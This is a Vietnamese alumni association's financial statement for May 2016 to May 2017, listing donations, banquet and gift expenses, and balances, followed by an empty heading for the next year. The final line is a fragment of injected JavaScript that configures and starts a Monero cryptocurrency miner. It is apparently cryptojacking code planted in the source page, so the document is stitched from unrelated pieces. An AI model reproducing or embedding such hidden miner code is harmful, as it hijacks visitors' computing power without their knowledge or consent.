THÔNG BÁO TÀI CHÁNH NLS ĐỊNH TƯỜNG- BẾN TRE ( 1-5-2016 ĐẾN 1-5-2017)

THÔNG BÁO TÀI CHÁNH NLS ĐỊNH TƯỜNG- BẾN TRE

( 1-5-2016 ĐẾN 1-5-2017)

Đơn vị: Đồng VN

Ngày

Đề Mục

Chi

Thu

Tồn

1-5-2016

 

 

 

9.712.000

 

Đóng góp BLL trước ĐH

 

4.500.000

 

1-5-2017

Đóng góp trong ngày họp

 

20.000.000

 

 

Bùi Duy Thiện k2

 

100USD

 

 

Nga – Sứ

 

100USD

 

1-5-2017

Tiệc ăn

22.000.000

 

 

 

Khánh tiết

1.800.000

 

 

 

Quà tặng Thầy cô

4.400.000

 

 

 

Xe đưa rước thầy cô

1.600.000

 

 

 

Quà tặng BLL bạn

1.518.000

 

 

 

TỔNG CỘNG

31.318.000

30.000.000

-1.318.000

 

 

 

 

8.394.000

14-5-2017

Anh Nguyễn Văn Quan hỗ trợ Quỹ Trường 500 CaD

 

8.150.000

16.544.000

 

 

 

 

 

 

 

 

 

 

THÔNG BÁO TÀI CHÁNH NLS ĐỊNH TƯỜNG - BẾN TRE

( 1-5-2017 ĐẾN 1-5-2018)


 

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();